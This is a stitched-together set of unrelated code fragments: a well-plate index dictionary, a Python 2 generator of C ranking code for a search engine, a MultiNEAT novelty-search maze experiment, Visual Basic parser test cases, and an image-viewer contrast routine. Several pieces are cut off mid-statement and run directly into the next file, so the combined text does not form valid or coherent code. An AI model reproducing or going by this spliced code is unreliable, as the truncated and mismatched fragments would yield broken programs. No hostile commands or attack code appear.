59: {
'col_and_row': u'C11',
'row': 3,
'col': 11,
'well_id': 59,
},
60: {
'col_and_row': u'C12',
'row': 3,
'col': 12,
'well_id': 60,
},
61: {
'col_and_row': u'C13',
'row': 3,
'col': 13,
'well_id': 61,
},
62: {
'col_and_row': u'C14',
'row': 3,
'col': 14,
'well_id': 62,
},
63: {
'col_and_row': u'C15',
'row': 3,
'col': 15,
'well_id': 63,
},
64: {
'col_and_row': u'C16',
'row': 3,
'col': 16,
'well_id': 64,
},
65: {
'col_and_row': u'C17',
'row': 3,
'col': 17,
'well_id': 65,
},
66: {
'col_and_row': u'C18',
'row': 3,
'col': 18,
'well_id': 66,
},
67: {
'col_and_row': u'C19',
'row': 3,
'col': 19,
'well_id': 67,
},
68: {
'col_and_row': u'C20',
'row': 3,
'col': 20,
'well_id': 68,
},
69: {
'col_and_row': u'C21',
'row': 3,
'col': 21,
'well_id': 69,
},
70: {
'col_and_row': u'C22',
'row': 3,
'col': 22,
'well_id': 70,
},
71: {
'col_and_row': u'C23',
'row': 3,
'col': 23,
'well_id': 71,
},
72: {
'col_and_row': u'C24',
'row': 3,
'col': 24,
'well_id': 72,
},
73: {
'col_and_row': u'D1',
'row': 4,
'col': 1,
'well_id': 73,
},
74: {
'col_and_row': u'D2',
'row': 4,
'col': 2,
'well_id': 74,
},
75: {
'col_and_row': u'D3',
'row': 4,
'col': 3,
'well_id': 75,
},
76: {
'col_and_row': u'D4',
'row': 4,
'col': 4,
'well_id': 76,
},
77: {
'col_and_row': u'D5',
'row': 4,
'col': 5,
'well_id': 77,
},
78: {
'col_and_row': u'D6',
'row': 4,
'col': 6,
'well_id': 78,
},
79: {
'col_and_row': u'D7',
'row': 4,
'col': 7,
'well_id': 79,
},
80: {
'col_and_row': u'D8',
'row': 4,
'col': 8,
'well_id': 80,
},
81: {
'col_and_row': u'D9',
'row': 4,
'col': 9,
'well_id': 81,
},
82: {
'col_and_row': u'D10',
'row': 4,
'col': 10,
'well_id': 82,
},
83: {
'col_and_row': u'D11',
'row': 4,
'col': 11,
'well_id': 83,
},
84: {
'col_and_row': u'D12',
'row': 4,
'col': 12,
'well_id': 84,
},
85: {
'col_and_row': u'D13',
'row': 4,
'col': 13,
'well_id': 85,
},
86: {
'col_and_row': u'D14',
'row': 4,
'col': 14,
'well_id': 86,
},
87: {
'col_and_row': u'D15',
'row': 4,
'col': 15,
'well_id': 87,
},
88: {
'col_and_row': u'D16',
'row': 4,
'col': 16,
'well_id': 88,
| |
to a list, annotating them with logical levels."""
# declarations processed, now for statements
while (line != '' and line.rstrip() != '}'):
# process statements
toks, chars = ctok_nspace(line)
if (len(toks) > 2
and (toks[0] in decl.keys())
and (toks[1] == '=' or toks[1] == '+='
or toks[1] == '-=' or toks[1] == '/='
or toks[1] == '*=' or toks[1] == '&='
or toks[1] == '|=' or toks[1] == '^=')):
# assignment statement
# extend logical 'line' and tokenise it
while (toks[-1] != ';'):
nline = file.readline()
lineno += 1
ntoks, nchars = ctok_nspace(nline)
toks.extend(ntoks)
line = line.rstrip() + ' ' + nline
target = decl[toks[0]]
level = 1
# check that we're not assigning to something
# we're not supposed to
if (target.lineno == 0
and target.type[0:len('const')] == 'const'):
print '#line', lineno, '"' + args[0] + '"'
print '#error "assigning to const quantity"'
used[toks[0]] = toks[0]
for t in toks[2:]:
if (t in decl.keys()):
used[t] = t
if (decl[t].level == 6):
print '#line', lineno, '"' + args[0] + '"'
print '#error "accumulator used as rvalue"'
elif (decl[t].level > level):
level = decl[t].level
# increase level of assigned quantity, providing basic level
# inference
if (toks[0] in decl.keys()):
decl[toks[0]].level = level
list.append([lineno, level, line.strip()])
elif (len(toks) and line.strip()[0] == '#'):
list.append([lineno, 1, '/* ' + line.strip()[1:].lstrip() + ' */'])
else:
# it's a different type of statement, check level differently
level = 1
for t in toks:
if (t in decl.keys()):
used[t] = t
if (decl[t].level == 6):
print '#line', lineno, '"' + args[0] + '"'
print '#error "accumulator used as rvalue"'
elif (decl[t].level > level):
level = decl[t].level
list.append([lineno, level, line.strip()])
# next line
line = file.readline()
lineno += 1
return [lineno, line]
def propagate(statements):
"""function to propagate levels from inside of braced statements
to the whole braced statement."""
# FIXME: needs to handle multiline blocks properly
prevlevel = 0
for s in statements:
if (s[2].find('}') >= 0):
if (s[2].find('{') < 0):
if (prevlevel > s[1]):
s[1] = prevlevel
prevlevel = s[1]
rev = map(lambda x: x, statements)
rev.reverse()
prevlevel = 0
for s in rev:
if (s[2].find('{') >= 0):
if (s[2].find('}') < 0):
if (prevlevel > s[1]):
s[1] = prevlevel
prevlevel = s[1]
def output_decl(definitions, dent, mfile, params, macros):
prevline = -1
definitions.sort(lambda x, y: x.lineno - y.lineno)
for d in definitions:
# check that it isn't a pre-defined quantity that we've
# already declared
if (d.lineno != -1 or len(d.macro) > 0 or len(d.init) > 0 or len(d.fninit) > 0):
# check if we have to output a #line directive
if (d.lineno != prevline + 1 and d.lineno != -1):
#print '#line', d.lineno, '"' + mfile + '"'
pass
prevline = d.lineno
if (not len(d.macro)):
str = dent + d.type
if (len(d.type) and d.type[-1] == '*'):
str += d.name
else:
str += ' ' + d.name
if (len(d.init)):
str += ' '
# output the line, replacing parameters
toks, spaces = ctok(d.init)
for t in toks:
if (t in macros):
str += macros[t]
else:
str += t
print
str += ';'
print str
num = 0
for d in definitions:
# check that it isn't a pre-defined quantity that we've
# already declared
if (len(d.fninit) > 0):
print indent(dedent(d.fninit), len(dent))
def print_level(statements, level, dent, name, macros):
# output statements that depend on level
prevline = -1
while (len(statements)):
l, statements = statements[0], statements[1:]
if (l[1] == level):
# check if we have to output a #line directive
if (l[0] != prevline + 1):
#print '#line', l[0], '"' + args[0] + '"'
pass
prevline = l[0]
# check if we need to decrease the dent (has to be before
# output for ending } brackets to be indented properly)
if (l[2].find('}') >= 0):
if (l[2].find('{') < 0):
dent -= 4
# output the line, replacing parameters
toks, spaces = ctok(l[2])
sys.stdout.write(' ' * dent)
for t in toks:
if (t in macros):
sys.stdout.write(macros[t])
else:
sys.stdout.write(t)
print
# check if we need to increase the dent
if (l[2].find('{') >= 0):
if (l[2].find('}') < 0):
dent += 4
# get the next non-whitespace token, or nothing if there isn't one
def next_tok(toks):
while (len(toks) and toks[0].isspace() == True):
toks = toks[1:]
return toks
def contrib_replace(x):
if (len(x.contrib)):
return x.contrib
else:
return x.macro
def get_replace_map(decls, fn = (lambda x: x.macro)):
map = {}
for i in filter(lambda x: len(fn(decls[x])) > 0, decls):
map[i] = '(' + fn(decls[i]) + ')'
return map
if __name__ == "__main__":
try:
(options, args) = getopt.getopt(sys.argv[1:], 'hv',
['help', 'version', 'debug'])
except getopt.GetoptError:
usage(sys.argv[0])
sys.exit(2)
# simple processing of options
header = False
body = False
debug = False
help = False
for opt, arg in options:
if opt in ['--help', '-h']:
help = True
elif opt in ['--version', '-v']:
print '%s version 0.2\n' % sys.argv[0]
sys.exit(2)
elif opt == '--debug':
debug = True
if (len(args) != 2 and not help):
usage(sys.argv[0])
sys.exit(2)
params = {} # parameter declarations
post_decl = {} # declarations in post
post = [] # statements in post
post_used = {} # quantities used in post
decode_decl = {} # declarations in decode
decode = [] # statements in decode
comments = [] # initial comments
decode_used = {} # quantities used in decode
# define pre-declared quantities in all three function namespaces
#
# levels are:
# - 0: undetermined
# - 1: depends on nothing
# - 2: depends on docno
# - 3: depends on f_dt
# - 4: depends on offset
# - 5: depends on attr
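# (as an illustration of the level inference in the assignment handling above,
# a hypothetical statement such as "w = f_dt * N;" would be assigned level 3,
# the maximum level of the declared quantities it reads)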
# declarations for inherent quantities (these are not output directly)
ins_decl([decode_decl], [decode_used], 'const unsigned int f_t;', 1, 'query->term[qterm].f_t',
ex='number of documents in collection term occurs in')
ins_decl([decode_decl], [decode_used], 'const unsigned int F_t;', 1, 'query->term[qterm].F_t',
ex='number of times term occurs in collection')
ins_decl([decode_decl], [decode_used], 'const unsigned int f_dt;', 3,
ex='number of times term occurs in current document')
#ins_decl([decode_decl], [decode_used], 'const unsigned int offset;', 4)
#ins_decl([decode_decl], [decode_used], 'const unsigned int attr;', 5)
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'float accumulator;', 2, 'acc->acc.weight',
ex='accumulated score of document')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int dterms = iobtree_size(idx->vocab);', 1,
ex='number of distinct terms in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const double terms = ((double) UINT_MAX) * idx->stats.terms_high + idx->stats.terms_low;', 1,
ex='number of terms in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int N = docmap_entries(idx->map);', 1,
ex='number of documents in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_bytes;', 1, '', -1,
'''\
if (docmap_avg_bytes(idx->map, &avg_D_bytes) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average bytes per document in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_terms;', 1, '', -1,
'''\
if (docmap_avg_words(idx->map, &avg_D_terms) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average terms per document in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_dterms;', 1, '', -1,
'''\
if (docmap_avg_distinct_words(idx->map, &avg_D_dterms) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average distinct terms per document in the collection')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'double avg_D_weight;', 1, '', -1,
'''if (docmap_avg_weight(idx->map, &avg_D_weight) != DOCMAP_OK) {
return SEARCH_EINVAL;
}''',
ex='average cosine weight per document in the collection')
# ins_decl([decode_decl, post_decl], None, 'const unsigned int Q_bytes;', 1, 'qstat->bytes',
# ex='number of bytes in the query string')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int Q_terms = search_qterms(query);', 1,
ex='number of terms in the query')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int Q_dterms;', 1, 'query->terms',
ex='number of distinct terms in the query')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const float Q_weight = search_qweight(query);', 1,
ex='cosine weight of query')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int D_bytes;', 2, 'docmap_get_bytes_cached(idx->map, acc->acc.docno)', -1, '',
'if (docmap_cache(idx->map, docmap_get_cache(idx->map) | DOCMAP_CACHE_BYTES) != DOCMAP_OK) return SEARCH_EINVAL;', 'avg_D_bytes',
ex='number of bytes in the current document')
ins_decl([decode_decl, post_decl], [decode_used, post_used],
'const unsigned int D_terms;', 2, 'DOCMAP_GET_WORDS(idx->map, acc->acc.docno)', -1, '',
'if (docmap_cache(idx->map, docmap_get_cache(idx->map) | DOCMAP_CACHE_WORDS)
#
# The script to run maze navigation experiment with Novelty Search optimization
# using the MultiNEAT library
#
# The Python standard library import
import os
import shutil
import math
import random
import time
import copy
import argparse
import pickle
# The MultiNEAT specific
import MultiNEAT as NEAT
from MultiNEAT.viz import Draw
# The helper used to visualize experiment results
import visualize
import utils
# The maze environment
import maze_environment as maze
import agent
import novelty_archive as archive
# The number of maze solving simulator steps
SOLVER_TIME_STEPS = 400
class ANN:
"""
The wrapper of MultiNEAT NeuralNetwork class
"""
def __init__(self, multi_neat_nn):
"""
Creates new instance of the wrapper for a given NeuralNetwork
"""
self.nn = multi_neat_nn
def activate(self, inputs):
"""
Function to activate associated NeuralNetwork with given inputs
Arguments:
inputs: the array with network inputs.
Returns:
The control signal outputs.
"""
# append bias
inputs.append(1.0)
# activate and get outputs
self.nn.Input(inputs)
self.nn.Activate()
return self.nn.Output()
class Genome:
def __init__(self, gen):
self.genome = gen
self.key = gen.GetID()
class MazeSimulationTrial:
"""
The class to hold maze simulator execution parameters and results.
"""
def __init__(self, maze_env, population, archive):
"""
Creates a new instance and initializes fields.
Arguments:
maze_env: The maze environment as loaded from configuration file.
population: The population for this trial run
archive: The archive to hold NoveltyItems
"""
# The initial maze simulation environment
self.orig_maze_environment = maze_env
# The record store for evaluated maze solver agents
self.record_store = agent.AgentRecordStore()
# The NEAT population object
self.population = population
# The NoveltyItem archive
self.archive = archive
def eval_individual(genome_id, genome, genomes, n_items_map, generation):
"""
Evaluates the individual represented by genome.
Arguments:
genome_id: The ID of genome.
genome: The genome to evaluate.
genomes: The genomes population for current generation.
n_items_map: The map to hold novelty items for current generation.
generation: The current generation.
Returns:
A tuple (solver_found, goal_fitness), where solver_found is True if a successful maze solver was found.
"""
# create NoveltyItem for genome and store it into map
n_item = archive.NoveltyItem(generation=generation, genomeId=genome_id)
n_items_map[genome_id] = n_item
# run the simulation
maze_env = copy.deepcopy(trial_sim.orig_maze_environment)
multi_net = NEAT.NeuralNetwork()
genome.BuildPhenotype(multi_net)
control_net = ANN(multi_net)
goal_fitness = maze.maze_simulation_evaluate(
env=maze_env,
net=control_net,
time_steps=SOLVER_TIME_STEPS,
n_item=n_item)
# Store simulation results into the agent record
record = agent.AgentRecord(generation=generation, agent_id=genome_id)
record.fitness = goal_fitness
record.x = maze_env.agent.location.x
record.y = maze_env.agent.location.y
record.hit_exit = maze_env.exit_found
#record.species_id = trial_sim.population.species.get_species_id(genome_id)
#record.species_age = record.generation - trial_sim.population.species.get_species(genome_id).created
# add record to the store
trial_sim.record_store.add_record(record)
# Evaluate the novelty of a genome and add the novelty item to the archive of Novelty items if appropriate
if not maze_env.exit_found:
# evaluate genome novelty and add it to the archive if appropriate
record.novelty = trial_sim.archive.evaluate_individual_novelty(genome=Genome(genome),
genomes=genomes, n_items_map=n_items_map)
# update fittest organisms list
trial_sim.archive.update_fittest_with_genome(genome=Genome(genome), n_items_map=n_items_map)
return (maze_env.exit_found, goal_fitness)
def eval_genomes(genomes, generation):
n_items_map = {} # The map to hold the novelty items for current generation
solver_genome = None
best_genome = None
max_fitness = 0
for _, genome in genomes:
found, goal_fitness = eval_individual(genome_id=genome.GetID(),
genome=genome,
genomes=genomes,
n_items_map=n_items_map,
generation=generation)
if found:
solver_genome = genome
max_fitness = goal_fitness
elif goal_fitness > max_fitness:
max_fitness = goal_fitness
best_genome = genome
# now adjust the archive settings and evaluate population
trial_sim.archive.end_of_generation()
for _, genome in genomes:
# set fitness value as a logarithm of a novelty score of a genome in the population
fitness = trial_sim.archive.evaluate_individual_novelty(genome=Genome(genome),
genomes=genomes,
n_items_map=n_items_map,
only_fitness=True)
# assign the adjusted fitness score to the genome
genome.SetFitness(fitness)
if solver_genome is not None:
return (solver_genome, True, max_fitness)
else:
return (best_genome, False, max_fitness)
def run_experiment(params, maze_env, novelty_archive, trial_out_dir, args=None, n_generations=100,
save_results=False, silent=False):
"""
The function to run the experiment against hyper-parameters
defined in the provided configuration file.
The winner genome will be rendered as a graph as well as the
important statistics of neuroevolution process execution.
Arguments:
params: The NEAT parameters
maze_env: The maze environment to use in simulation.
novelty_archive: The archive to work with NoveltyItems.
trial_out_dir: The directory to store outputs for this trial
n_generations: The number of generations to execute.
save_results: The flag to control if intermediate results will be saved.
silent: If True then no intermediate outputs will be
presented until a solution is found.
args: The command line arguments holder.
Returns:
True if experiment finished with successful solver found.
"""
# set random seed
seed = int(time.time())#1562938287#42#1563358622#1559231616#
random.seed(seed)
# Create Population
genome = NEAT.Genome(0, 11, 0, 2, False, NEAT.ActivationFunction.UNSIGNED_SIGMOID,
NEAT.ActivationFunction.UNSIGNED_SIGMOID, 0, params, 0)
pop = NEAT.Population(genome, params, True, 1.0, seed)
# Create the trial simulation
global trial_sim
trial_sim = MazeSimulationTrial(maze_env=maze_env, population=pop, archive=novelty_archive)
# Run for up to N generations.
start_time = time.time()
best_genome_ser = None
best_ever_goal_fitness = 0
best_id = -1
solution_found = False
for generation in range(n_generations):
gen_time = time.time()
# get list of current genomes
genomes = NEAT.GetGenomeList(pop)
genomes_tuples = []
for genome in genomes:
genomes_tuples.append((genome.GetID(), genome))
# evaluate genomes
genome, solution_found, fitness = eval_genomes(genomes_tuples, generation)
# store the best genome
if solution_found or best_ever_goal_fitness < fitness:
best_genome_ser = pickle.dumps(genome)
best_ever_goal_fitness = fitness
best_id = genome.GetID()
if solution_found:
print('Solution found at generation: %d, best fitness: %f, species count: %d' % (generation, fitness, len(pop.Species)))
break
# advance to the next generation
pop.Epoch()
# print statistics
gen_elapsed_time = time.time() - gen_time
print("\n****** Generation: %d ******\n" % generation)
print("Best objective fitness: %f, genome ID: %d" % (fitness, best_id))
print("Species count: %d" % len(pop.Species))
print("Generation elapsed time: %.3f sec" % (gen_elapsed_time))
print("Best objective fitness ever: %f, genome ID: %d" % (best_ever_goal_fitness, best_id))
print("Best novelty score: %f, genome ID: %d\n" % (pop.GetBestFitnessEver(), pop.GetBestGenome().GetID()))
elapsed_time = time.time() - start_time
best_genome = pickle.loads(best_genome_ser)
# write best genome to the file
best_genome_file = os.path.join(trial_out_dir, "best_genome.pickle")
with open(best_genome_file, 'wb') as genome_file:
pickle.dump(best_genome, genome_file)
# write the record store data
rs_file = os.path.join(trial_out_dir, "data.pickle")
trial_sim.record_store.dump(rs_file)
print("Record store file: %s" % rs_file)
print("Random seed:", seed)
print("Trial elapsed time: %.3f sec" % (elapsed_time))
print("Best objective fitness: %f, genome ID: %d" % (best_ever_goal_fitness, best_genome.GetID()))
print("Best novelty score: %f, genome ID: %d\n" % (pop.GetBestFitnessEver(), pop.GetBestGenome().GetID()))
# Visualize the experiment results
show_results = not silent
if save_results or show_results:
if args is None:
visualize.draw_maze_records(maze_env, trial_sim.record_store.records, view=show_results)
else:
visualize.draw_maze_records(maze_env, trial_sim.record_store.records,
view=show_results,
width=args.width,
height=args.height,
filename=os.path.join(trial_out_dir, 'maze_records.svg'))
# store NoveltyItems archive data
trial_sim.archive.write_fittest_to_file(path=os.path.join(trial_out_dir, 'ns_items_fittest.txt'))
trial_sim.archive.write_to_file(path=os.path.join(trial_out_dir, 'ns_items_all.txt'))
# create the best genome simulation path and render
maze_env = copy.deepcopy(trial_sim.orig_maze_environment)
multi_net = NEAT.NeuralNetwork()
best_genome.BuildPhenotype(multi_net)
control_net = ANN(multi_net)
path_points = []
evaluate_fitness = maze.maze_simulation_evaluate(
env=maze_env,
net=control_net,
time_steps=SOLVER_TIME_STEPS,
path_points=path_points)
print("Evaluated fitness: %f, of best agent ID: %d" % (evaluate_fitness, best_genome.GetID()))
visualize.draw_agent_path(trial_sim.orig_maze_environment, path_points, Genome(best_genome),
view=show_results,
width=args.width,
height=args.height,
filename=os.path.join(trial_out_dir, 'best_solver_path.svg'))
return solution_found
def create_params():
params = NEAT.Parameters()
params.PopulationSize = 500 # 250
params.DynamicCompatibility = True
params.AllowClones = False
params.AllowLoops = True
params.CompatTreshold = 6.0
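# note: "CompatTreshold" (and the other "...Treshold" names here) is the
# spelling used by the MultiNEAT parameter attributes themselves, so it
# should not be "corrected" in this file.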
params.CompatTresholdModifier = 0.3
params.YoungAgeTreshold = 15
params.SpeciesMaxStagnation = 20
params.OldAgeTreshold = 200
params.MinSpecies = 3
params.MaxSpecies = 20
params.RouletteWheelSelection = True
params.RecurrentProb = 0.2
params.OverallMutationRate = 0.3
params.LinkTries = 40
params.SpeciesDropoffAge = 200
params.DisjointCoeff = 1.0
params.ExcessCoeff = 1.0
params.MutateWeightsProb = 0.90
params.WeightMutationMaxPower = 0.8
params.WeightReplacementMaxPower = 5.0
params.MutateWeightsSevereProb = 0.5
params.WeightMutationRate = 0.75
#params.MaxWeight = 8
params.MutateAddNeuronProb = 0.1
params.MutateAddLinkProb = 0.5
params.MutateRemLinkProb = 0.1
params.Elitism = 0.1
params.CrossoverRate = 0.2
params.MultipointCrossoverRate = 0.6
params.InterspeciesCrossoverRate = 0.01
params.MutateNeuronTraitsProb = 0.1
params.MutateLinkTraitsProb = 0.1
return params
if __name__ == '__main__':
# read command line parameters
parser = argparse.ArgumentParser(description="The maze experiment runner (Novelty Search).")
parser.add_argument('-m', '--maze', default='medium',
help='The maze configuration to use.')
parser.add_argument('-g', '--generations', default=500, type=int,
help='The number of generations for the evolutionary process.')
parser.add_argument('-t', '--trials', type=int, default=1, help='The number of trials to run')
parser.add_argument('-n', '--ns_threshold', type=float, default=6.0,
help="The novelty threshold value for the archive of NoveltyItems.")
parser.add_argument('-r', '--location_sample_rate', type=int, default=4000,
help="The sample rate of agent position points saving during simulation steps.")
parser.add_argument('--width', type=int, default=400, help='The width of the records subplot')
parser.add_argument('--height', type=int, default=400, help='The height of the records subplot')
args = parser.parse_args()
if not (args.maze == 'medium' or args.maze == 'hard'):
print('Unsupported maze configuration: %s' % args.maze)
exit(1)
# The current working directory
local_dir = os.path.dirname(__file__)
# The directory to store outputs
out_dir = os.path.join(local_dir, 'out')
out_dir = os.path.join(out_dir, 'maze_ns_multineat')
# Clean results of previous run if any or init the output directory
utils.clear_output(out_dir)
# Run the experiment
= "DriveID"',
])
# << Parsing tests >> (28 of 61)
# Unicode
tests.extend([
'cIÅ = 10',
'a = cIÅ + 30',
'a = "cIÅ there"',
])
# Unicode sub
tests.append("""
Sub cIÅ()
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (29 of 61)
# Simple If
tests.append("""
If a = 10 Then
b = 20
End If
If c < 1 Then
d = 15
End If
""")
# Empty If
tests.append("""
If a = 10 Then
End If
""")
# Empty If with comments
tests.append("""
If a = 10 Then ' comment here
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
End If
If c < 1 Or d Then
d = 15
End If
""")
# Simple If with compound And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
""")
# If Not
tests.append("""
If Not a = 10 Then
b=2
End If
""")
# If With labels and comment
tests.append("""
10: If Not a = 10 Then 'heres a comment
20: b=2 ' antoher here
30: End If ' here too
""")
# << Parsing tests >> (30 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
Else
b = 10
End If
If c < 1 Then
d = 15
Else
d = -12
End If
""")
# Empty If/Else
tests.append("""
If a = 10 Then
Else
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
Else
b = 1234
End If
If c < 1 Or d Then
d = 15
Else
e = "hello"
End If
""")
# Simple If with compound And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
Else
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
Else
h = 1234
End If
""")
# << Parsing tests >> (31 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
End If
""")
# Simple If with compound And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
End If
""")
# << Parsing tests >> (32 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
Else
b = 1111
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
Else
d = "wow"
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
Else
b = 4321
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
Else
g = 1
End If
""")
# Simple If with compound And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
Else
k = 3234
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
doIt
End If
""")
# << Parsing tests >> (33 of 61)
# Simple Nested If
tests.append("""
If a = 10 Then
b = 20
If c < 1 Then
d = 15
End If
End If
""")
# Complex nested If
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
End If
Else
k = 3234
End If
""")
# << Parsing tests >> (34 of 61)
# Inline ifs
tests.extend([
"If a = 10 Then b = 20",
"If a = 20 And b = 5 Then d = 123",
"If a = 12 Then d = 1 Else g = 5",
"If a = 10 Then doit",
"If a = 10 Then doit 10, 20, 30",
"If a = 10 Then doit Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont 5, 10, 15",
"If a = 10 Then Exit Function",
"If a = 10 Then Exit Function Else DoIt",
"If a = 10 Then Exit Function Else DoIt=1",
"If a = 10 Then Exit Function Else DoIt 1, 2, 3",
"If a = 10 Then DoIt Else Exit Function",
"If a = 10 Then DoIt=1 Else Exit Function",
"If a = 10 Then DoIt 1,2,34 Else Exit Function",
])
# Weird inline if followed by assignment that failed once
tests.extend([
"If a = 10 Then b a\nc=1",
])
# << Parsing tests >> (35 of 61)
# #If
tests.append("""
#If a = 10 Then
b = 20
#Else
c=2
#End If
#If c < 1 Then
d = 15
#Else
c=2
#End If
""")
# Empty #If
tests.append("""
#If a = 10 Then
#Else
c=2
#End If
""")
# Empty #If with comments
tests.append("""
#If a = 10 Then ' comment here
#Else
c=2
#End If
""")
# Simple #If with And/Or
tests.append("""
#If a = 10 And k = "test" Then
b = 20
#Else
c=2
#End If
#If c < 1 Or d Then
d = 15
#Else
c=2
#End If
""")
# Simple #If with compound And/Or expression
tests.append("""
#If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
#Else
c=2
#End If
#If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
#Else
c=2
#End If
""")
# #If Not
tests.append("""
#If Not a = 10 Then
b=2
#Else
c=2
#End If
""")
# << Parsing tests >> (36 of 61)
# simple sub
tests.append("""
Sub MySub()
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub()
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.extend(["""
Private Sub MySub()
a=10
n=20
c="hello"
End Sub""",
"""
Public Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Friend Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Private Static Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
])
# simple sub with gap in ()
tests.append("""
Sub MySub( )
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (37 of 61)
# simple sub
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (38 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x As Single, y, z As Object, a, b As MyThing.Object, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y As Variant, z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (39 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and
def SetAutoContrast (self,value):
if value != self.auto_contrast:
self.auto_contrast = value
self.adjust_contrast()
self.Refresh()
AutoContrast = property(GetAutoContrast,SetAutoContrast,doc=
"Automatically scale the image intensity")
def adjust_contrast (self):
"This automatically scales the intensity of the image."
if not self.AutoContrast: return
from numpy import average,histogram
image = self.Image
# Convert to grayscale if needed.
if image.ndim > 2: image = average(image,axis=0)
# Set the saturation level such that 99% of all pixels are
# below saturation level.
hist = histogram(image,bins=65536,range=[0,65535],normed=True)[0]
##print "sum(hist) = %g" % sum(hist)
integral = 0
for i in range(0,65536):
integral += hist[i]
if integral > 0.99: break
##print "sum(hist[0:%d]) = %g" % (i,sum(hist[0:i]))
self.SaturationLevel = i
def GetImageSize(self):
w,h = self.Image.shape[-2:]
return w*self.PixelSize,h*self.PixelSize
ImageSize = property(GetImageSize,doc="width and height of image in mm")
def GetViewportCenter(self):
"""Center (x,y) coordinates of the part of the image displayed in the
window in mm with respect to the top left corner of the image.
"""
w,h = self.ClientSize
x0,y0 = self.ViewStart
sx,sy = self.GetScrollPixelsPerUnit()
